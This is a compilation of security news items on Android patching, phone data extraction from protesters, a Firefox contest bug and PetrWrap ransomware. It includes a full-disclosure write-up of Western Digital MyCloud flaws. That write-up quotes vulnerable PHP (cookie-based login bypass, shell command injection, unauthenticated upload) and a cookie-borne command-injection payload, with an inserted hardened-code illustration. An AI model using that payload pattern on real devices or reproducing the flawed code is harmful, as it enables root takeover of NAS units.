Chances are, your Android phone would be easy pickings for hackers. That's according to research released Thursday by cybersecurity company Skycure, which found that 71 percent of Android phones on the five major US carriers haven't been patched with the latest security updates. That could be because users haven't installed updates, or because they haven't received them from carriers. The report highlights the risks posed by not updating smartphones, and the challenges Google faces in delivering security updates to Android users. Why should Android users be worried about staying up to date on their security updates? In the hacking world, security updates show bad guys all the ways that phones, computers or other devices can be compromised. For example, an Android security update in December patched a flaw nicknamed "Dirty Cow" that could have let hackers get root privileges -- essentially the keys to the kingdom -- on an Android phone. So if you don't (or can't) update, hackers can build tools to break into your phone. Patching makes these hacking tools useless. "Malware, network attacks and advanced exploitation campaigns many times depend on unpatched vulnerabilities to be successful," Yair Amit, co-founder and chief technical officer at Skycure, said in a statement. The carriers in the Skycure study are T-Mobile, MetroPCS, AT&T, Verizon and Sprint. T-Mobile (which merged with MetroPCS in 2013) didn't immediately provide a comment. Sprint, Verizon and AT&T didn't immediately respond to requests for comment.
Google declined to respond to the Skycure report, but a spokesman pointed to its report published Wednesday on Android security, which gave details on the company's efforts to distribute monthly Android security updates. These updates have to first go to carriers like those listed in the Skycure report before they can be sent to users' phones. "We released monthly Android security updates throughout [2016] for devices running Android 4.4.4 and up -- that accounts for 86.3 percent of all active Android devices worldwide," members of the Android security team wrote in a blog post about the report on Wednesday. The report also said the company improved its ability to stop dangerous apps from getting onto the Google Play store and then to users' phones. But Android acknowledged there was "a lot of room for improvement" in its security update process. "About half of devices in use at the end of 2016 had not received a platform security update in the previous year," members of the Android security team wrote in their blog post. Source
22. Police officers push back demonstrators as they protest against US President Donald Trump in Washington, DC, on January 20, 2017.

Court papers say data is being extracted from 100 locked phones seized during arrests at anti-Trump protests.

Prosecutors are trying to pull data from 100 locked phones seized during arrests made in Washington, DC on Inauguration Day, according to court papers filed Wednesday. Prosecutors said they have search warrants to extract data from the phones, which were seized by law enforcement officers on January 20 from 214 individuals arrested on felony rioting charges related to demonstrations protesting the inauguration of Donald Trump, according to a BuzzFeed report. The filing suggests that even though the phones are locked, prosecutors have successfully copied data from them, although it doesn't describe their methods. Prosecutors said in the filing they expect to "produce all of the data from the searched [phones] in the next several weeks." Wednesday's filing comes amid a mounting war of words between tech companies and policy makers, who contend that terrorist groups are benefiting from encryption, the technology that jumbles communications and files so that only the intended recipient can read them. Tech companies have become increasingly diligent about including encryption in products and services in the wake of revelations about US government surveillance programs from documents leaked by former NSA contractor Edward Snowden. Apple's iPhone was at the center of a legal back-and-forth between the government and Apple last year after the December 2015 attack that left 14 people dead. The government wanted Apple to write new software that would unlock the phone and make its data readable, but Apple refused, saying that weakening the encryption would potentially leave other iPhone users at risk.
In a surprise revelation in March 2016, the Department of Justice said an unnamed outside party helped agents break into an iPhone 5C that was used by shooter Syed Farook. However, the agency wouldn't disclose exactly how the hacker got into the phone. The data extracted from protesters' phones includes personal information irrelevant to the charges, so prosecutors are seeking a court order that would prohibit defense lawyers from copying or reproducing information unless it's relevant to the defense of their client. Representatives for the US Attorney's Office for the District of Columbia, which filed the papers Wednesday in the DC Superior Court, did not immediately respond to a request for comment. Source
23. Hacking the Western Digital MyCloud NAS

Sometimes at Exploitee.rs, we look for fun devices to hack and sometimes the devices find us. Today we’re going to talk about a recent time where we found ourselves in the latter situation and our experience with the Western Digital series of Network Attached Storage devices.

In the middle of last year I (Zenofex) began looking for a NAS that provided hardware decoding through my currently preferred media player, Plex. After a bit of research I ordered a Western Digital “MyCloud” PR4100. This device met all the requirements of what I was looking for and came highly recommended by a friend. After adding the NAS to my network and visiting the device’s admin page for the first time, I grew wary of adding a new device to my network without giving it a proper audit. So, I logged in, enabled SSH access, and looked at how the web server functionality of the device worked.

Login Bypass

I quickly found the first bug that shocked me; this bug was based on code that performed a user login check but did so using cookies or PHP session variables. Using cookies for authentication isn’t necessarily a bad thing, but the way that the Western Digital MyCloud interface uses them is the problem. Examine the code below.

/lib/login_checker.php

    function login_check()
    {
        $ret = 0;

        if (isset($_SESSION['username']))
        {
            if (isset($_SESSION['username']) && $_SESSION['username'] != "")
                $ret = 2; //login, normal user

            if ($_SESSION['isAdmin'] == 1)
                $ret = 1; //login, admin
        }
        else if (isset($_COOKIE['username']))
        {
            if (isset($_COOKIE['username']) && $_COOKIE['username'] != "")
                $ret = 2; //login, normal user

            if ($_COOKIE['isAdmin'] == 1)
                $ret = 1; //login, admin
        }

        return $ret;
    }

The above code contains a function called “login_check”; this function is used by all of the backend PHP scripts and is used to verify pre-authenticated users.
The above code has two paths, one which involves checking the session values for “username” and “isAdmin” and another (if the prior fails) that attempts to complete the same process but with cookies. Because cookies are supplied by the user, the requirements that the scripts are looking for can be met by the attacker. The above process for sessions and cookies is summed up as follows.

“username” variable is set and is not empty – User is logged in as a normal privileged user.
“isAdmin” variable is set to 1 – User is logged in as an administrator.

This means that any time there is a login check within the PHP scripts, an attacker is able to bypass the check by supplying 2 specially crafted cookie values.

During the process of writing up my findings a new firmware was rolled out patching the above bug. However, this patch introduced a new vulnerability which had the same consequences as the original (prior to the update). Below is the current version including the fixed code.

/var/www/web/lib/login_checker.php

    20 function login_check()
    21 {
    22     $ret = 0;
    23
    24     if (isset($_SESSION['username']))
    25     {
    26         if (isset($_SESSION['username']) && $_SESSION['username'] != "")
    27             $ret = 2; //login, normal user
    28
    29         if ($_SESSION['isAdmin'] == 1)
    30             $ret = 1; //login, admin
    31     }
    32     else if (isset($_COOKIE['username']))
    33     {
    34         if (isset($_COOKIE['username']) && $_COOKIE['username'] != "")
    35             $ret = 2; //login, normal user
    36
    37         if ($_COOKIE['isAdmin'] == 1)
    38             $ret = 1; //login, admin
    39
    40         if (wto_check($_COOKIE['username']) === 0) //wto check fail
    41             $ret = 0;
    42     }
    43
    44     return $ret;
    45 }
    46 ?>

In the updated version of the code, a call to the new method “wto_check()” is made (line 40). This function runs a binary on the device with the client supplied username as an argument along with the user’s IP address. If the user is currently logged in and hasn’t timed out the value 1 is returned, otherwise 0 is returned (indicating the user isn’t logged in).
The code for the “wto_check()” method can be found below.

/var/www/web/lib/login_checker.php

     3 /*
     4 return value: 1: Login, 0: No login
     5 */
     6 function wto_check($username)
     7 {
     8     if (empty($username))
     9         return 0;
    10
    11     exec(sprintf("wto -n \"%s\" -i '%s' -c", escapeshellcmd($username), $_SERVER["REMOTE_ADDR"]), $login_status);
    12     if ($login_status[0] === "WTO CHECK OK")
    13         return 1;
    14     else
    15         return 0;
    16 }
    17
    18 /* ret: 0: no login, 1: login, admin, 2: login, normal user */
    19

In the above you can see that on line 11 the command is formatted to include the username and IP address as arguments to the “wto” binary. The problem with the above is the incorrect use of the PHP method “escapeshellcmd()” which, in its intended usage, handles an entire command string, and not just an argument. This is because the “escapeshellcmd()” function does not escape quotes and therefore allows an attacker the ability to break out of the encapsulating quotes (in our case for the “-n” argument), allowing for new arguments to be supplied to the binary. Because of this, instead of actually checking if the user is logged in, we can add new arguments and log the user in ourselves. That said, we do not believe that simply verifying that the user is already logged in by checking an IP address and login timeout is sufficient. The programmer who wrote this code should have used “escapeshellarg()”, which is intended to filter independent binary arguments and which does filter out quotes. Using “escapeshellarg()” as opposed to the currently used “escapeshellcmd()” would have at least prevented this attack from working.

Command Injection Bugs

A majority of the functionality of the WDCloud web interface is actually handled by CGI scripts on the device. Most of the binaries use the same pattern: they obtain post/get/cookie values from the request, and then use the values within PHP calls to execute shell commands.
In most cases, these commands will use the user supplied data with little or no sanitization. For example, consider the following code from the device.

php/users.php

    $username = $_COOKIE['username'];
    exec("wto -n \"$username\" -g", $ret);

The code above assigns a value from the COOKIE superglobal variable, which contains array indexes for cookies submitted from the request, to the local variable “$username”. This value is then immediately used in a PHP “exec()” call as an argument to the local “wto” binary. Since there is no sanitization, using a username value like

    username=$(touch /tmp/1)

turns the existing exec command into

    wto -n "$(touch /tmp/1)" -g

and executes the user supplied command within. Because the argument is encapsulated with double quotes and we use the “$(COMMANDHERE)” syntax, the command “touch /tmp/1” is executed prior to the execution of the “wto” binary and the return value of which is used as its “-n” argument. This basic pattern resulting in a command injection vulnerability is used multiple times within the many scripts used by the web interface. While some may have normally been prevented by authentication being required, that restriction is overcome by the authentication bypass mentioned above. Also, it is important to note that all commands executed through the web interface are done so as the user the web-server is running as, which, in this case is root.
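As an added illustration (not code from the Exploitee.rs write-up or the MyCloud firmware), the PHP below puts the cookie-trusting login check and the escapeshellcmd()-built "wto" command line from the write-up next to hardened equivalents: authorization read only from the server-side session, and every argument allow-listed and quoted with escapeshellarg(), which also closes the users.php exec() pattern. The allow-list rule and the sample inputs are assumptions; the wto flags are the ones shown above.

```php
<?php
// Added example, not Exploitee.rs' or Western Digital's code. Run: php example.php
declare(strict_types=1);

/* Hardened login_check(): the authorization decision comes only from the
 * server-side session. $_COOKIE is attacker-controlled and is never read.
 * Return values keep the firmware's convention: 0 no login, 1 admin, 2 user. */
function login_check_hardened(array $session): int
{
    if (!isset($session['username']) || $session['username'] === '') {
        return 0;
    }
    // Strict comparison avoids PHP type juggling on the admin flag.
    return (($session['isAdmin'] ?? 0) === 1) ? 1 : 2;
}

/* Vulnerable builder, mirroring line 11 of wto_check(): escapeshellcmd() is
 * meant for a whole command string and leaves paired quotes alone, so a
 * username containing two double quotes closes the -n argument early and
 * whatever follows becomes additional arguments to the binary. */
function build_wto_cmd_vulnerable(string $username, string $ip): string
{
    return sprintf("wto -n \"%s\" -i '%s' -c", escapeshellcmd($username), $ip);
}

/* Hardened builder: validate against an allow-list first, then quote each
 * argument individually with escapeshellarg(), which wraps the value in
 * single quotes and escapes any embedded single quote. Returns null on bad
 * input so the caller treats the request as "not logged in" and runs nothing. */
function build_wto_cmd_hardened(string $username, string $ip): ?string
{
    // Assumed rule for valid NAS account names (not the firmware's own rule).
    if (preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $username) !== 1) {
        return null;
    }
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return sprintf('wto -n %s -i %s -c', escapeshellarg($username), escapeshellarg($ip));
}

/* Constructed inputs: an empty session (a request carrying only forged
 * username/isAdmin cookies), a genuine session, and a username with paired
 * double quotes. */
function demo(): array
{
    $real_session = ['username' => 'alice', 'isAdmin' => 0];
    $quoted_name  = 'a" "b';

    return [
        // Cookies are never consulted, so a cookie-only request yields no login.
        'cookies_only'   => login_check_hardened([]),
        'real_session'   => login_check_hardened($real_session),
        // Paired quotes pass through escapeshellcmd() untouched: an extra argument appears.
        'vulnerable_cmd' => build_wto_cmd_vulnerable($quoted_name, '10.0.0.5'),
        // The same input is rejected before any command line is built.
        'hardened_bad'   => build_wto_cmd_hardened($quoted_name, '10.0.0.5'),
        'hardened_ok'    => build_wto_cmd_hardened('alice', '10.0.0.5'),
    ];
}

foreach (demo() as $label => $value) {
    printf("%-15s %s\n", $label, var_export($value, true));
}
```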
Other Errata

While you may think that the above bugs are severe, there are a number of other errors within the web interface with some being as simple as the normal authentication being commented out:

addons/ftp_download.php

    //include ("../lib/login_checker.php");
    //
    ///* login_check() return 0: no login, 1: login, admin, 2: login, normal user */
    //if (login_check() == 0)
    //{
    //    echo json_encode($r);
    //    exit;
    //}

And others being more functionality specific, like the following example of a bug allowing a non-authenticated user the ability to upload files onto the myCloud device.

addons/upload.php

    //if(!isset($_REQUEST['name'])) throw new Exception('Name required');
    //if(!preg_match('/^[-a-z0-9_][-a-z0-9_.]*$/i', $_REQUEST['name'])) throw new Exception('Name error');
    //
    //if(!isset($_REQUEST['index'])) throw new Exception('Index required');
    //if(!preg_match('/^[0-9]+$/', $_REQUEST['index'])) throw new Exception('Index error');
    //
    //if(!isset($_FILES['file'])) throw new Exception('Upload required');
    //if($_FILES['file']['error'] != 0) throw new Exception('Upload error');

    $path = str_replace('//','/',$_REQUEST['folder']);
    $filename = str_replace('\\','',$_REQUEST['name']);
    $target = $path . $filename . '-' . $_REQUEST['index'];

    //$target = $_REQUEST['folder'] . $_REQUEST['name'] . '-' . $_REQUEST['index'];

    move_uploaded_file($_FILES['file']['tmp_name'], $target);

    //$handle = fopen("/tmp/debug.txt", "w+");
    //fwrite($handle, $_FILES['file']['tmp_name']);
    //fwrite($handle, "\n");
    //fwrite($handle, $target);
    //fclose($handle);

    // Might execute too quickly.
    sleep(1);

The above code contains no checks for authentication and, when called, will simply retrieve the uploaded file contents and use the user supplied path to determine where to place the new file. Beyond the bugs listed in this blog post, our wiki is full of bugs we’ve found within the MyCloud web interface.
Our general goal at Exploitee.rs is to get bugs fixed as quickly as possible. However, the large number of severe findings means that we may need to re-evaluate the product after the vendor has properly fixed the released vulnerabilities.

Responsible Disclosure

At Exploitee.rs, we normally attempt to work with vendors to ensure that vulnerabilities are properly released. However, after visiting the Pwnie Awards at the last BlackHat Vegas, we learned of the vendor’s reputation within the community. In particular, this vendor won a “Pwnie for Lamest Vendor Response” in a situation where the vendor ignored the severity of a set of bugs reported to them. Ignoring these bugs would leave the vulnerable devices online for longer periods while responsible disclosure is worked out. Instead we’re attempting to alert the community of the flaws and hoping that users remove their devices from any public facing portions of their networks, limiting access wherever possible. Through this process, we’re fully disclosing all of our research and hoping that this expedites the patches to users’ devices.

Bugs Found Statistics

1 x Login Bypass
1 x Arbitrary File Write
13 x Unauthenticated Remote Command Execution Bugs
70 x Authentication Required Command Execution Bugs*

*”Authentication Required” bugs can be reached with the login bypass bug.

Scope

Most, if not all, of the research can be applied to the entire series of Western Digital MyCloud products. This includes the following devices:

My Cloud
My Cloud Gen 2
My Cloud Mirror
My Cloud PR2100
My Cloud PR4100
My Cloud EX2 Ultra
My Cloud EX2
My Cloud EX4
My Cloud EX2100
My Cloud EX4100
My Cloud DL2100
My Cloud DL4100

Video Demo

Source
24. Mozilla Fixes Critical Vulnerability in Firefox 22 Hours After Discovery

White hats were rewarded $30,000 for the effort

The new Firefox version 52.0.1 which was released late on Friday contains the patch for the flaw discovered by hackers in the competition. The fix was confirmed via Twitter by Asa Dotzler, Mozilla participation director for Firefox OS, as well as Daniel Veditz, security team member at Mozilla. The bug was discovered by the Chaitin Security Research Lab from China. The hackers managed to escalate privileges in an exploit during the hacking competition by combining the bug with an initialized buffer in the Windows kernel. The bug bounty for this particular vulnerability was $30,000, indicating that it was a serious matter. In a security advisory published by Mozilla, the company marks the integer overflow in the createImageBitmap() as "critical." They say that the bug was fixed in the newest version by disabling experimental extensions to the createImageBitmap API. Mozilla also claims that since the function works in the content sandbox, it would have required a second vulnerability to compromise a user's computer. Chaitin used, in this instance, the Windows kernel.

Largest awards so far

Many vulnerabilities were discovered during the hacking competition. So far, few have been fixed, and definitely not many as fast as the one Mozilla patched up in Firefox. Microsoft and Apple are two of the companies people are waiting to hear from in this regard. In total, contestants were awarded $833,000 for the discovered vulnerabilities this year, nearly double what was awarded last year. In 2016, the awards reached $460,000 and the previous year $577,000. In the end, it all depends on how good a day the hackers have to find something critical to exploit. Source
25. The attackers patch Petya on the fly to use their own encryption key, bypassing the malware's original creators in the process

In a case of no honor among thieves, a group of attackers has found a way to hijack the Petya ransomware and use it in targeted attacks against companies without the program creators' knowledge. A computer Trojan dubbed PetrWrap, being used in attacks against enterprise networks, installs Petya on computers and then patches it on the fly to suit its needs, according to security researchers from antivirus vendor Kaspersky Lab. The Trojan uses programmatic methods to trick Petya into using a different encryption key than the one its original creators have embedded inside its code. This ensures that only the PetrWrap attackers can restore the affected computers to their previous state. The Trojan also removes all mentions of Petya from the ransom message, as well as its signature red skull designed in ASCII. Petya first appeared a year ago and immediately stood out from other ransomware programs. Instead of encrypting files directly, it replaces the hard drive's master boot record (MBR) code, which normally starts the operating system, with malicious code that encrypts the drive's master file table (MFT). The MFT is a special file on NTFS volumes that contains information about all other files: their name, size, and mapping to hard disk sectors. The actual contents of the user's files are not encrypted, but without the MFT, the OS no longer knows where those files are located on disk. Unlike other ransomware infections that only lock access to certain files by encrypting them, Petya locks access to the entire computer. With a corrupted MBR and MFT, the operating system will no longer start, and users will only be greeted by a ransom message on the screen when they turn on their computer. The decision to hijack and use Petya without its authors' consent is clever because it solves several problems for the PetrWrap attackers.
First of all, they don't have to write their own ransomware program, which is hard to get right, and they don't have to pay someone else for a ready-made solution either. Second, because it has been around for a while, Petya has had time to mature into a well-developed piece of malware. The PetrWrap attackers use Petya version 3, the latest variant of the program, which, unlike previous versions, has no known flaws. That's because its creators have perfected their encryption implementation over time. Creating something like Petya from scratch would not only be prone to errors but would also require knowledge of writing low-level bootloader code for the MBR. Once inside a network, the PetrWrap attackers look for and steal administrative credentials. They then use the PsExec tool to deploy the malware to all endpoint computers and servers they can access. There is no tool to decrypt the MFT of hard disk volumes affected by Petya, but because this malware doesn't actually encrypt the file contents, some data recovery tools might be able to reconstruct the files from hard disk raw data.